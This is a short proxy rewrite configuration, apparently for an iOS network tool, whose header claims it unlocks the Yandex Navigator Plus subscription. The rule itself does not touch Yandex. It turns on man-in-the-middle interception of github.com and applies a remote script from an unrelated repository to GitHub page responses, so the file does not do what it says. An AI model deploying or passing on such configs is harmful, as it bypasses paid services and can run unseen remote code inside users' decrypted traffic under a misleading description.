# NAME: Yandex Plus for Navigator
# AUTHOR: Yarmukhamedov
# DESCRIPTION: This Snippet unlocks Plus subscription in Yandex Navi app
# UPDATED: 2023-12-09 13:41:23

[rewrite_local]
^https?:\/\/github\.com\/[^\/]+\/[^\/]+\/blob\/ url script-response-header https://raw.githubusercontent.com/BOBOLAOSHIV587/zTest/refs/heads/main/KG.js

[mitm]
hostname = github.com
